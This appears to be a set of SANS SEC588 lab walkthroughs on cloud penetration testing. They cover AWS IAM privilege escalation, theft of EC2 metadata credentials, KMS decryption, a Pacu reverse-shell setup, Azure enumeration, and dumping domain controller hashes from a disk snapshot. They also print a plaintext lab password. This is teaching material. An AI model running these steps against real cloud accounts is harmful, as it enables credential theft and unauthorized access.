Let's take a look at our blog site; if we open Firefox, navigate to: blog.<class-subdomain>.sec588.net.
This particular site appears to be able to Create a New Post.

As a user you can create a post. You should go ahead and enter one in. AS AN EXAMPLE, the author is using the following one:
Once this is created we can see more functionality, such as that the blog post can have comments.
Notice however that every post URL has a number (#); in our EXAMPLE we are using:

/posts/7

Record your post's number because we will need this later, and we will use it for our lab in the next section.

Once you have created a comment you may notice that comments can be deleted:
Look above at the output of gobuster; you probably saw many different URLs, but one in particular may have stood out.

Let's take a look at /api closely; when you open it you may notice that it is a Swagger API:

Please note that this API is a Development API and the functionality of the API is not yet fully enabled. Using the 'Execute' function of this API will not yield you any results.
The Swagger UI has two options that seem to be usable: one is the GET method, another is the DELETE method. This one may be one that we may want to explore.

This will DELETE your post, but it could also delete any post on the system, so be kind to your neighbors.

Your author as an example will DELETE the {id} of 7; you may or may not have a different number.
Do not use the Execute command to execute the request; it will not work. Use the curl below!
Conclusion
In this lab we covered how to use a large wordlist to comb through an environment and uncovered not just potentially hidden and not necessarily known servers but also hidden endpoints and potentially hidden functionality. We looked at how the functionality of one system could be changed by just uncovering an API section.

In the wild we may find that the full functionality and security of a system is bypassed by using hidden APIs, hidden administrative consoles, or just by attempting to access sections of an application that are not meant to be accessed.
Why This Lab Is Important
All too often we see websites that have multiple avenues for testing but are missed. As penetration testers we should be looking for all of the avenues that we may find on a system, whether they are fully documented or not. It just so happens that /api was a fully documented API, but not every single one will be. Don't be afraid to try
Bonus (If Time Permits or Homework)
There is a hidden Ruby console that is available on the system. See if you can trigger the console by finding a broken page or creating some kind of error on the system. If you find the console, see if you can execute Ruby
Additional Resources
Brief Intro
AWS IAM can be very complex, with many options to configure permissions in various different places. While that complexity can be managed through advisory-type software, most often permissions are set very loosely. This lab will walk you through leveraging keys and elevating privileges to be able to eventually obtain access to data.

There are a few IAM mechanisms that we will explore, including looking at versioning and looking at using EC2.
Requirements for This Lab
It will also require that we have our AWS tools installed in our VM; you can check this by typing the following command in the CLI and looking for the aws help message:

$ aws
Try It Yourself
1. Review your policy set
2. Find an EC2 Instance Profile that you can leverage
3. Run an EC2 instance that contains your user private key to login
Walkthrough
Getting started
We will begin our lab where we left our previous labs; in Lab 2.1 we leveraged an AWS CLI token and now we wish to
The first item that we will wish to review is the ability for us to see the secret data:

$ cat /home/sec588/files/workdir/secretdata.txt
This file appears to be base64 encoded; we can tell by the format, as the encoding uses only the following characters: a-z, A-Z, 0-9, +, /. We also can tell by the fact that there is padding of = used. Let's run this through the base64 decoder in our

$ base64 -d /home/sec588/files/workdir/secretdata.txt

The file will print garbage instead of text. This is indicative that there is something special about this file. Maybe this file is encrypted? Amazon does provide a Key Management Service to help protect data. Let's attempt to use it:

We can see that we are unable to leverage the system, getting an error:

(AccessDeniedException)
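The "is this base64, and does it decode to text or to something opaque" reasoning above, turned into a check you can run on a file. This is an added example, not part of the workbook; the three samples standing in for secretdata.txt are constructed here so it runs offline, and the 0.95 printable-ratio threshold is an assumption.

```python
import base64
import binascii
import re

# Constructed samples standing in for secretdata.txt (no real lab data):
# base64 of readable text, base64 of 64 non-text bytes, and a plain sentence.
PLAIN_B64 = base64.b64encode(b"this is a readable note\n").decode()
RANDOM_B64 = base64.b64encode(bytes((i * 73 + 17) % 256 for i in range(64))).decode()
NOT_B64 = "hello world, not encoded!"

# The alphabet the lab describes (A-Z, a-z, 0-9, +, /) plus up to two '=' of padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def looks_like_base64(text):
    """The check the lab does by eye, made strict: only alphabet characters,
    padding only at the end, and a length that is a multiple of 4 once
    whitespace/newlines are stripped. Returns the decoded bytes, or None."""
    compact = "".join(text.split())
    if not compact or len(compact) % 4 or not B64_RE.match(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error:
        return None


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII or tab/newline/CR."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


def triage(text, threshold=0.95):
    """Classify a file the way the lab reasons about secretdata.txt:
    'not-base64'  - fails the alphabet/padding/length check;
    'text'        - decodes to (almost entirely) printable bytes;
    'opaque'      - decodes, but to non-text bytes, i.e. the 'garbage' the lab
                    sees, which is what ciphertext or a KMS blob looks like."""
    data = looks_like_base64(text)
    if data is None:
        return "not-base64"
    return "text" if printable_ratio(data) >= threshold else "opaque"


if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_B64), ("random", RANDOM_B64), ("raw", NOT_B64)):
        print(f"{label}: {triage(sample)}")
```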
Finding a way to escalate privileges
What privileges do we have? IAM can be complicated: the user can have policies directly attached to them and they can also have policies that are not attached but specified.

Listing out Bob's policies:

Note: if you are not sure of bob's username you can always look it up. This command will allow us to get Bob's actual username:

| get-user: will get the user name for the current session you are in.

It would appear Bob has no direct policies. Let's see if he has any policy attachments:
$ aws iam list-attached-user-policies --profile lab22 --user-name bob-<class-subdomain>

REMEMBER: A user can have direct policies, but they can also have attached policies, and either one can provide additional rights and permissions.
Bob has one attached policy. Copy the ARN from the previous command. Let's now look at his policy.

Attempt to run this command:

$ aws iam get-policy-version --profile lab22 --policy-arn <from previous command> --version-id v1

If the command shows you that it does not work, for example:
Try additional versions v2, v3 ... In our labs we had up to v6.

A user can have up to 5 policies, no more. Look at all the policies; do any of them reflect KMS?
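The workbook leaves "look at all the versions, do any of them reflect KMS?" as a manual read. As an added example (not the workbook's own code), here is a Python pass over constructed get-policy-version output that flags watched actions per version and reports the ones only a non-default version grants; the policy documents, the pictures-example bucket name and the watch-list are assumptions made for the example.

```python
import fnmatch

# Constructed policy versions, shaped like the "PolicyVersion" object that
# `aws iam get-policy-version --version-id vN` returns for successive N.
# The statements and resource names are made up for this example.
POLICY_VERSIONS = {
    "v1": {"IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*"], "Resource": "*"}]}},
    "v2": {"IsDefaultVersion": True, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "s3:Get*", "Resource": "arn:aws:s3:::pictures-example/*"},
        {"Effect": "Allow", "Action": ["ec2:Describe*", "ec2:RunInstances", "iam:PassRole"],
         "Resource": "*"}]}},
    "v3": {"IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["kms:Decrypt", "kms:ListKeys"], "Resource": "*"},
        {"Effect": "Deny", "Action": "kms:CreateKey", "Resource": "*"}]}},
}

# Actions worth flagging if any version of the policy grants them (assumed watch-list).
WATCH = ["kms:Decrypt", "iam:PassRole", "ec2:RunInstances",
         "iam:SetDefaultPolicyVersion", "lambda:InvokeFunction"]


def _as_list(x):
    """IAM allows a single string or a list for Statement and Action."""
    return x if isinstance(x, list) else [x]


def action_matches(pattern, action):
    """IAM action patterns are case-insensitive and use '*' / '?' wildcards
    (e.g. 's3:Get*', 'kms:*', '*')."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def allowed_actions(document, watch):
    """Watched actions that an Allow statement grants and no Deny statement in
    the same document takes away. Conditions and Resource scoping are ignored,
    which errs on the side of flagging."""
    allowed, denied = set(), set()
    for stmt in _as_list(document["Statement"]):
        patterns = _as_list(stmt.get("Action", []))
        hits = {w for w in watch if any(action_matches(p, w) for p in patterns)}
        (allowed if stmt["Effect"] == "Allow" else denied).update(hits)
    return sorted(allowed - denied)


def audit_versions(versions, watch=WATCH):
    """Per-version grants, plus 'latent': watched actions that some non-default
    version grants but the default does not. Those are what changing the default
    version would switch on without editing a single policy document, so a
    reviewer should prune old versions that carry them."""
    per_version = {v: allowed_actions(d["Document"], watch) for v, d in versions.items()}
    default = next(v for v, d in versions.items() if d["IsDefaultVersion"])
    latent = {a for v, acts in per_version.items() if v != default for a in acts}
    latent -= set(per_version[default])
    return {"default": default, "per_version": per_version, "latent": sorted(latent)}


if __name__ == "__main__":
    report = audit_versions(POLICY_VERSIONS)
    print("default version:", report["default"])
    for v, acts in report["per_version"].items():
        print(f"{v}: {acts}")
    print("granted only by a non-default version:", report["latent"])
```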
We can however look at other services that we have access to. We have a few options available to us: we have EC2, and we have the PassRole option available to use as well.
Reviewing EC2 Instances
EC2 systems can have their own policy permissions. This is done so that EC2 instances can then talk to other AWS services. Given the limited set of privileges we have, let's explore what Role Assignments may be in use by

"\(.InstanceId) || \(.IamInstanceProfile.Arn)"'

We now see that we have several instances with several IamInstanceProfiles attached. Did you happen to notice an instance with the name KMS in it?

arn:aws:iam::<numbers>:instance-profile/ec2-kms-<class-subdomain>
$ aws ec2 describe-instances --instance-id <id from> --profile lab22 --output table

Let's grab the following items:
Record these two items; we will need them to create our OWN EC2 instance. We will use this in an exercise coming up.

We have an EC2 instance that potentially is running with a permission set that could provide us with the right permissions to do some type of action with KMS. While KMS appears in the name, there is no other real way with the permissions we have to determine what this role can do. What we can do is attach this

"Resource": "arn:aws:ec2:*::image/ami-00a208c7cdba991ea"
Your instructor will provide you a number; replace X with that number.

For vLive, Simulcast, and OnDemand students we recommend that you create a key based on the following variables: 1XXXX where XXX is the last octet of your computer's IP address on the internet. You can use www.ipchicken.com (http://www.ipchicken.com) to find out your IP address. For individuals with IP addresses below 100 you can use 0's; for example, for an address that ends in 88 you can use 1088 as your student number.

$ aws ec2 create-key-pair --profile lab22 --key-name studentX-<class-subdomain> --query 'KeyMaterial' --output text > /home/sec588/files/workdir/studentX-<class-subdomain>.pem

Now with that key we can use the values recorded above to launch an EC2 instance:

$ aws ec2 run-instances --profile lab22 --image-id ami-00a208c7cdba991ea --iam-instance-profile Arn=<Arn from the ec2-kms-class-subdomain> --key-name studentX-<class-subdomain> --subnet-id <subnetId> --security-group-ids <GroupId> --output table
This process may take up to 5 minutes. RECORD THE INSTANCE ID.

Note the instance ID in the output; once the system is launched you will be able to SSH to it via its public IP
Scroll through and look for a public IP address.

$ chmod 600 /home/sec588/files/workdir/student1-<class-subdomain>.pem
Please note the following pieces of data to be used later:

This lab has shown us that while we may not think that a permission is harmless, a skilled attacker could take a seemingly restrictive permission and abuse it to accomplish what they are after. We will also see how this permission set can be abused further.
Additional Resources
SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Brief Intro
Throughout this course you will be interacting with many of the Amazon Web Services APIs. We discovered an AWS key string potentially in our Day 1 Lab 4 exercise. Let's see if we can actually attempt to use those particular keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can help us get further into the environment.

A diagram of what we are going to attempt in this lab is found below.
Requirements for This Lab
Try It Yourself
1. Copy the AWS EC2 Service Token by leveraging the AWS IAM Metadata Key
2. The Metadata token will allow you to list out KMS keys
3. Decrypt the secretdata.txt file by leveraging KMS to perform the operation on your behalf
4. List out AWS Lambda Functions
5. Execute the function called 'lambda-<class_subdomain>'
6. Find the secrets in each case.
Walkthrough
Getting started
This lab should pick us up where we left off. We should be able to have SSH access to our environment:

From this machine we have full root permissions; this can be confirmed by running a few root commands:

$ sudo ls /root

There will be no password set for sudo on this device. This device can also laterally move around the environment as it is in a VPC that is adjacent to other nodes; open a new MATE window and let's look for an IP

(.InstanceId) \(.PrivateIpAddress)"'

None of the instances may allow 'ping'; however, if you attempt ssh to one of them you will get a login prompt or an SSH key accept prompt. These instances, while potentially not available to the public, are internal, and may allow for lateral movement.

$ ssh 10.10.10.X
Let's however try and obtain the keys to elevate our privileges, from the EC2 instance we are in:

$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials

The output will not look very well formed; it may show up like this:

ec2-kms-role-<class-subdomain>ubuntu@<ip>

We need to copy the role name up to the word ubuntu and then add this to the next query:

$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-kms-role-<class-

The output will reflect as follows:

{
"Code" : "Success",
"LastUpdated" : "<Time>",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIXXXXXXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXX",
"Token" : "XXXXXXXXXXXXXXXXXXXX/////////XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"Expiration" : "<Time>"
}
Now that we have a valid token with Access Key ID we can go ahead and move those into the appropriate locations; open a new terminal window. By performing these commands we are now going to be logging into EC2 as this new user. From that window open your favorite text editor and edit /home/sec588/.aws/credentials:

nano /home/sec588/.aws/credentials

[lab25]
aws_access_key_id = <AccessKeyIdHere>
aws_secret_access_key = <SecretAccessKeyHere>
aws_session_token = <TokenHere>

Then open the file /home/sec588/.aws/config with your favorite editor and add the following section at the end:

[profile lab25]
region = us-east-1

With our new token, let's see if we can now 'solve our previous challenge'. Can we list KMS keys?
aws kms list-keys --profile lab25

To see if the decrypt is possible we can ask KMS to use its own knowledge of available keys to perform decrypt operations:

aws kms decrypt --profile lab25 --ciphertext-blob fileb://<(cat /home/sec588/files/workdir/secretdata.txt | base64 -d) --output text --query Plaintext | base64 -d > unsecretdata.txt

You should now be able to run cat unsecretdata.txt and it would reveal our 'secret data!'
Additional Privileges with Lambda!
This particular profile role has Lambda privileges. We can uncover this by just attempting the following:

aws lambda list-functions --profile lab25

You could see a Lambda function called:

lambda-<class-subdomain>

Let's execute this function and see if it will work with an empty payload:

aws lambda invoke --function-name lambda-<class-subdomain> --profile lab25 ./lambda-out.txt

cat ./lambda-out.txt
The following permissions allowed us to perform these actions:

"lambda:ListFunctions",
"lambda:InvokeFunction",
"lambda:InvokeAsync"

For KMS we just need decrypt and list permissions:

"kms:Decrypt",
"kms:ListKeyPolicies",
"kms:ListRetirableGrants",
"kms:ListGrants",
"kms:ListKeys",
"kms:Encrypt",
"kms:ListAliases",
"kms:CreateKey"

Without that many rights we can perform a lot of damage, so we should be cautious and careful with these keys and permissions.
Why This Lab Is Important
In the last 2 labs we have gone from a non-privileged, or less than privileged, AWS user to a user that has the capability to perform additional functions. By performing these operations we should be able to gain more access to the AWS environments, and we can show the criticality of why these keys need to be protected.

We always recommend learning how to harden your environments, and as such we recommend our Secure
Brief Intro
Pacu is a tool that will allow us to automate the enumeration, exploitation and discovery of services in Amazon Web Services (AWS). Much of the previous labs can be automated using the Pacu tool. While the tool is not without its small limitations, it does provide automation for many of the manual workflows we have done. Leveraging the Pacu tool we can weaponize keys that we have found.
Requirements for This Lab
This lab requires the student to have:

Finished Labs 2.4 and 2.5, have a set of API keys that are current in time, and can validate that the commands
Try It Yourself
2. Import all of your keys
6. List out the data for each of these commands, specifically lambda
Walkthrough

Let's open the MATE terminal so that we can launch Postman
cd /opt/pacu

To ensure that we do not have data that is corrupt we will type the following commands:

rm sqlite.db
rm -Rf sessions
mkdir sessions
Pacu allows you to get access to existing credentials; to do this we can run a few commands:

>import_keys --all

This command will import the two keys you have in your existing AWS credentials file. Let's swap to Lab22:

>swap_keys

Let's see how we can run some commands. First let's set our region, but what region will we use? We are currently in us-east-1 unless your instructor has told you otherwise. The regions command will show us:

>regions

To set this region to us-east-1: this will tune our scans to just the single region instead of all regions and make our labs faster.
To list out all the modules type the following command:

>ls

We can see a fairly large number of modules. Let's look at the iam__enum_permissions module.

>help iam__enum_permissions

We now see a few options that allow us to target specific users or roles. For now, let's just run the module as is.

>run iam__enum_permissions
>run iam__enum_users_roles_policies_groups

This module leverages the IAM Enum permissions to give us all the data; however, it is not able to display it all on the screen.

>data

One more item: let's replicate one of our earlier labs. Can we replicate a version change automatically?

>run iam__privesc_scan

We can actually do this; this tool will help us run the aws command to replace our access using the right privileges
ec2-kms-instance-profile-<class-subdomain>

Do you recall seeing this from Lab 2.5? It is because we actually have this instance profile mapped to us.

Now let's choose 4; let's attempt to use the SSH Create an EC2 function to get the credentials. This will create the EC2 instance, it will give you the IP address of the request, and it will also print out the private key. All of this has to be put together in one piece to be able to get the same result as Lab 2.5.
Lambda listings
>run lambda__enum

This will fail; we do not have rights. We did however have a user that had the appropriate rights; let's see how we

swap_keys
run lambda__enum

We now have enumerated Lambdas; to see this let's type data, but this time we will specify the service.

data Lambda
If you have time there are specific commands that allow you to run a proxy client; the proxy can provide a reverse shell back to your system. To use the proxy client you will need a few things:

1. A registered ngrok account; it can be a free account. Make sure you have completed this from yesterday's lab.
2. Open terminal 1, start ngrok by using the following command:

ngrok tcp 9998

3. Open terminal 2, start a socat listener on a DIFFERENT SHELL:

5. Open terminal 3; you may have to get the ngrok TCP/IP address for socat.

nslookup X.tcp.ngrok.io

NOTE: X will be a number, and it can change! Because you may have DNS resolution issues you may

sudo apt update

7. Save the script file as script.txt; this is all done from /home/sec588/files/workdir.
8. Make sure Pacu is running, and run the following command. Remember that Lab22 is the user with rights; you may need to swap_keys.

run ec2__startup_shell_script --instance-ids <instance id from lab 2.4 and 2.5>@us-east-1 --script /home/sec588/files/workdir/script.txt

9. The shell will take up to 5 minutes to be found because the system needs to be shut down and booted.
Conclusion
Throughout this lab, we walked through what it would take to automate an attack on AWS with proper tooling. The tooling for much of these items does not necessarily exist yet, as many of these technologies are nascent. The more that we see these technologies be attacked, the greater our toolsets will be.

Pacu provides us with the capability to automate the testing of an AWS account's set of permissions. Quite often the complexity of the AWS system may leave the administrators with a sense of security with the proliferation of
We will be playing around with Azure AD and the different RBAC roles that exist. To understand a bit of the Azure AD permissions and the different RBAC roles, we will be using the Azure CLI tools that we have installed as well as the Azure Portal to look at the permissions on the system.

There are several ways we can manage Azure resources:

Manage the resources through the Web URL
Manage the resources through the az cli, which is cross platform and doesn't require PowerShell

For the majority of our tools we will be using the az cli tool; we will, however, also be using the web interface, and we will also show you how to get Windows command execution in an upcoming exercise.
Try It Yourself

1. Use the az login tool to log in via a web browser and through the cli.
2. Use the tool to list out users and to list out the roles that the users have on resources.
3. List out the virtual machines in the system, their associated disks, their associated snapshots, and their associated backups.
4. Log in via the browser and list out the Azure AD Domain Services Resources.
Walkthrough
$ az login -h

Here we can see that there are a few options. One option is to use the following:

$ az login

This would allow us to log in using the web browser; it will open Firefox. Choose Login as a New user, or if prompted login
Once you log in, you will not be returned to the terminal; you need to manually click on it to see the successful login:
This is just one way to log in, but it requires the browsing interface to be available. What if you needed a different option to log in, such as one in which you did not have a web browser or GUI fallback option?

$ az logout

Here is a different login option, where you can pass usernames and passwords over the command prompt:
Now that we are in, we can attempt to understand what permissions we may have for this user.

First let's take a tour of the different Azure Active Directory commands; with Azure Active Directory we can see our users and see some of their profile information:

$ az ad --help

If you look, there are several 'subcommands' for az ad, such as user as well as app and sp . We will use some of

$ az ad user --help
Now let's take a look at the list of users on the system. The first command will show you a JSON array, which may be difficult for you to manipulate; instead let's use table format, as in the second command:

$ az ad user list

$ az ad user list --query '[].{DisplayName:displayName,UserPrincipalName:userPrincipalName,UserType:userType}' -o table
The command above allowed us to manipulate the output by filtering down what is displayed, as well as naming the columns with different names. The query syntax is JMESPath (http://jmespath.org/tutorial.html).
Now we can see all the users that are on the system, which ones are guests and which ones are active members. But what permissions do they have in Azure? For this we need a few more queries. We will look at the Azure roles first:

Now this list is also in a JSON array, so let's use the table format to try and get a better idea of the output:
It appears that Summer has a global reader role in Azure. Let's try and see what other resources we may have rights to.

Let's manipulate the query to show us:
1. The name of the Virtual Machine
2. The resource group of the Machine
3. The provisioning state of the Virtual Machine
4. The Virtual Machine hardware size

$ az vm list --query '[].{Name:name,ResourceGroup:resourceGroup,ProvisioningState:provisioningState,VMSize:hardwareProfile.vmSize}' -o table --resource-group <class-subdomain>-resources

It would appear that this environment has a few machines. Some of them are Standard_DS2_V2 , and there may be other sizes as well. You may see names such as dc1 and iis that are clues, but could also not necessarily be a Domain
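The user and VM listings above both rely on az's JMESPath --query projections. The following is an added example, not code from the workbook, that evaluates the small JMESPath subset these commands use ([].{Key:path,...}, [id], dotted paths) and renders the -o table and -o tsv views, so the projections can be studied offline; the sample records and the subscription id in them are constructed, not real tenant data.

```javascript
// Added example, not from the SEC588 workbook: a small evaluator for the JMESPath
// subset that the az --query strings on this page use, with renderers for the
// -o table and -o tsv views, so the projections can be studied without an Azure login.
// Supported forms: [].{Key:path,...}  [].path  {Key:path,...}  [path,...]  path
// (path is a dotted identifier such as hardwareProfile.vmSize). The records below
// are constructed to look like az output and are not real tenant data.

function evalPath(obj, path) {
  // Walk a dotted identifier path; a missing key yields null, as JMESPath does.
  const v = path.split('.').reduce(
    (cur, key) => (cur !== null && cur !== undefined ? cur[key] : null), obj);
  return v === undefined ? null : v;
}

function compileProjection(expr) {
  expr = expr.trim();
  if (expr.startsWith('{') && expr.endsWith('}')) {          // multiselect hash
    const pairs = expr.slice(1, -1).split(',').map((pair) => {
      const i = pair.indexOf(':');
      if (i < 0) throw new Error('bad multiselect pair: ' + pair);
      return [pair.slice(0, i).trim(), pair.slice(i + 1).trim()];
    });
    return (item) => Object.fromEntries(pairs.map(([k, p]) => [k, evalPath(item, p)]));
  }
  if (expr.startsWith('[') && expr.endsWith(']')) {          // multiselect list, e.g. [id]
    const paths = expr.slice(1, -1).split(',').map((s) => s.trim());
    return (item) => paths.map((p) => evalPath(item, p));
  }
  return (item) => evalPath(item, expr);                     // plain path
}

function jmesQuery(data, query) {
  query = query.trim();
  if (query.startsWith('[]')) {                              // flatten projection over an array
    if (!Array.isArray(data)) throw new Error('[] projection needs an array');
    let rest = query.slice(2).trim();
    if (rest.startsWith('.')) rest = rest.slice(1).trim();
    return data.map(rest ? compileProjection(rest) : (x) => x);
  }
  return compileProjection(query)(data);
}

function toCells(row) {
  if (Array.isArray(row)) return row;
  if (row !== null && typeof row === 'object') return Object.values(row);
  return [row];
}

function renderTsv(result) {
  // -o tsv: one line per row, tab-separated, null rendered as empty
  const isRecord = (r) => r !== null && typeof r === 'object';
  const rows = Array.isArray(result) && result.length > 0 && result.every(isRecord)
    ? result.map(toCells) : [toCells(result)];
  return rows.map((r) => r.map((v) => (v === null ? '' : String(v))).join('\t')).join('\n');
}

function renderTable(rows) {
  // -o table: header from the projected key names, a dashed rule, one line per row
  if (!Array.isArray(rows) || rows.length === 0) return [];
  const headers = Object.keys(rows[0]);
  const cell = (v) => (v === null || v === undefined ? '' : String(v));
  const widths = headers.map((h) => Math.max(h.length, ...rows.map((r) => cell(r[h]).length)));
  const line = (vals) => vals.map((v, i) => v.padEnd(widths[i])).join('  ').trimEnd();
  return [line(headers), line(widths.map((w) => '-'.repeat(w))),
          ...rows.map((r) => line(headers.map((h) => cell(r[h]))))];
}

const SAMPLE_USERS = [   // constructed, shaped like `az ad user list`
  { displayName: 'Summer', userPrincipalName: 'summer@sec588.com', userType: 'Member' },
  { displayName: 'Contractor', userType: 'Guest',
    userPrincipalName: 'contractor_example.com#EXT#@sec588.onmicrosoft.com' },
];
const SAMPLE_VMS = [     // constructed, shaped like `az vm list`
  { name: 'dc1', resourceGroup: 'class-resources', provisioningState: 'Succeeded',
    hardwareProfile: { vmSize: 'Standard_DS2_v2' } },
  { name: 'iis', resourceGroup: 'class-resources', provisioningState: 'Succeeded',
    hardwareProfile: { vmSize: 'Standard_B2s' } },
];
const SAMPLE_SNAPSHOT = { // constructed, shaped like `az snapshot show`; placeholder subscription id
  name: 'dc1-disk1-student-X',
  id: '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/class-resources'
    + '/providers/Microsoft.Compute/snapshots/dc1-disk1-student-X',
};
const USER_QUERY = '[].{DisplayName:displayName,UserPrincipalName:userPrincipalName,UserType:userType}';
const VM_QUERY = '[].{Name:name,ResourceGroup:resourceGroup,ProvisioningState:provisioningState,'
  + 'VMSize:hardwareProfile.vmSize}';

// Defender's use of the same projection: guest principals are the ones whose role
// assignments most need review.
function guestUsers(users) {
  return jmesQuery(users, USER_QUERY)
    .filter((u) => u.UserType === 'Guest').map((u) => u.UserPrincipalName);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderTable(jmesQuery(SAMPLE_USERS, USER_QUERY)).join('\n'));
  console.log(renderTable(jmesQuery(SAMPLE_VMS, VM_QUERY)).join('\n'));
  console.log(renderTsv(jmesQuery(SAMPLE_SNAPSHOT, '[id]')));   // the snapId the snapshot lab stores
}
```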
Now compute instances can have disks attached to them that form the hard disk of the machine. We can list out

You can see which of these disks exist; in our case it's one disk per machine, but it could be more, and there could even be orphaned disks . Keep this in mind when looking over these disks.

$ az snapshot list --resource-group <class-subdomain>-resources
What we see here is a disk called 'dc1-disk'. This is potentially a snapshot of the domain controller disk. Given enough risk we may be able to get a copy of this disk and pull out domain controller artifacts.

Now how do we see backups? Backups are stored in a vault; to see the backups you need two pieces: first you need the 'vault name', and you need the resource group. To get the resource groups we are working with you could use the following command again:
To get the name of the vaults we can list out all vaults:

Here we can list out all the vaults and get the name of the vaults we want to look at. Armed with this information we can construct our query:

$ az backup item list --resource-group <class-subdomain>-RESOURCES --vault-name <Vault name from vault list command>
Understanding the limitations of our tools
While we have been using az exclusively, not all functions are exposed to az directly. Let's begin by opening up Firefox, found on the desktop.

https://portal.azure.com

From here you will be asked to sign in. You can use the summer@sec588.com account. At the top of the search bar, you
Conclusion

This lab is the beginning of a cursory tour of the az tool. The tool itself can be wielded both for legitimate system administration and for our own use in a penetration test, if we understand how to navigate the system. Just like the aws tool, the az tool works at the control plane layer and could circumvent some of the traditional controls we

Over the next few labs, we will be using this tool to implement our actions, getting familiar with how to use the tool for

Additional Resources
While we have seen the ways that Azure and Amazon expose their APIs through their CLI tools, we can also interact with many of these environments with the native SDKs. This lab will introduce us to using the Azure API in Postman, and by doing so we will:

1. Learn how the OAuth Flow in Azure works, so that we can later leverage it to find a higher privileged account.
2. See how Device Flow will lead us to using a bearer token. We can later use this type of access for items like Microsoft Graph.
3. Learn how to use Postman to import a collection.

Requirements for This Lab
Try It Yourself

1. Use the az login tool to log in via a web browser and through the cli.
2. Create a clientSecret using the Postman-APP that is located in the Azure AD App Environment. You can use the jerry account to create a valid authentication.
5. See what level of Authentication the API has with the API.

Walkthrough
Let's open the MATE terminal so that we can launch Postman
$ az login

Once you log in, you will not be returned to the terminal; you need to manually click on it to see the successful login:
Username: jerry@sec588.com
Password: HumanMusic2019

From this point we will use the Firefox application to navigate the Azure Portal.

Log into: http://portal.azure.com .

Using the Azure Portal search options type the following:

Azure Active Directory
Click on the application. Record the following options:

From here we will now need to create a client secret to be able to connect our Postman into our system.
With these values we can now configure Postman .

[http://bit.ly/2TPlWRO]

The URL above has a lowercase L and the letter O, NOT the number Zero.
From here RIGHT CLICK Download the JSON and choose Save Link As...
Let's open the MATE terminal so that we can launch Postman

$ cd /opt/postman
$ ./Postman
To log into Azure we will need to perform an OAuth Device Flow Authentication. This will be a two-step operation. In the first step we will use OAuth device flow to get a Device Flow Authentication token, which will be our

Click on the left hand side under the Azure REST Folder: Get AAD Token .
Click on the Body button (or tab, depending on how you view this). At this point we should be able to see the Body of the request. The Body shows us that we need several Environment Variables:
Under Environment click Add on the right. We can now add an Environment. Let's call it: Azure .

Add the following Environment Variables and fill in the CURRENT Values field:

clientSecret
subscriptionId
resource This needs to be set to: https://management.azure.com as we will be testing access to this resource.
Note the capitalization. The first word is all lowercase and the second word begins with an uppercase letter. Make sure that none of the variables have spaces BEFORE or AFTER the word.

Select Add and then click the X at the top corner to close out the Environments screen completely.

Once you click Send you will see a response with an access_token .
Copy this value, and click the Eyeball to enter it in as the bearerToken .

bearerToken This is the access_token value; because it has a dot (.) you cannot just double-click the value to

subscriptionId:

Now we will need to get a subscriptionId. To get this, open a terminal and type the following commands to get the

Armed with these values we can now formulate a new API request. Underneath the request for Get AAD Token you should see a Get Resource Groups request. Choose it.

Once it is open click Headers . You will now see some unresolved variables. Let's input these.
{
  "error": {
    "code": "AuthorizationFailed"
  }
}

Please note, this is not Authentication failed, this is Authorization failed, which means authentication passed, but you are not scoped to access this resource. The resource is an Azure AD Resource. Later today we will be using these keys to access Office Resources.
Conclusion

While this lab did not yield exploitation, it builds on the fact that today we will be using the Postman tool in a new and different way. In order to successfully use the tool we need to understand how to build programmatic access to Azure, and this lab demonstrates how to successfully do this by using the Device Token Flow of SAML to authenticate.

Additional Resources
SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Using the capabilities of the system, we may be able to leverage the ability of Azure to back up and restore disks, abusing this process to obtain additional information about local resources. This lab demonstrates how to use the system to gain access to hashes in the SAM database and the NTDS.DIT for a Domain Controller.

Requirements for This Lab

This lab requires a few items:

The az tool
Try It Yourself

dc1-disk1 student-X
4. Use the secretsdump.py tool that ships with impacket to extract the local administrator hash.

Walkthrough

Making Snapshots

Let's open the MATE terminal so that we can launch Azure Storage Explorer.
$ cd /opt/StorageExplorer

The Storage Explorer tool is an Electron-based tool, so it may take a few minutes to launch.

Please note Storage Explorer is not the most stable of applications and may require you to run the command more than once. If you receive a .NET 2.2 error, run the application again.

$ ./StorageExplorer
The Azure Storage Explorer is a menu-driven system where you can view storage blobs and storage environments. You can look through the system and see what you have available to you.

Once you've explored a bit, let's navigate to the following location:

Here there are a few disks; locate the one called dc1-disk1, and click the button at the top that says 'Create

dc1-disk1-student-X

Wait until the job is 'done'; this may take a few minutes.
Note during a real engagement we may wish to hide our activities, and given the number of Windows vs. Linux systems deployed we may choose to hide amongst the masses by using whatever is more common.

The first item is that we need to get the Snapshot ID of our snapshot:

snapId=$(az snapshot show --name dc1-disk1-student-X --resource-group <class-subdomain>-resources --query [id] -o tsv)

To check if this command worked use:

echo $snapId
With the disk available, we can now create a VM. Given enough permissions, we can create a VM and mount the disk. What if this is just a backup/restore account? It probably would have this capability.

You may need to log in as Jerry if you have not yet done this or your session has expired:

Once the Virtual Machine is created you can do the following:

A set of keys is created for you if they are not already on the system: ~/.ssh/id_rsa and ~/.ssh/id_rsa.pub

A Public IP Address for your VM is provided to you in the JSON array
You should now be able to log in to the system by typing the following:

$ ssh StudentX@<publicIpAddress>
SecretsDump.py

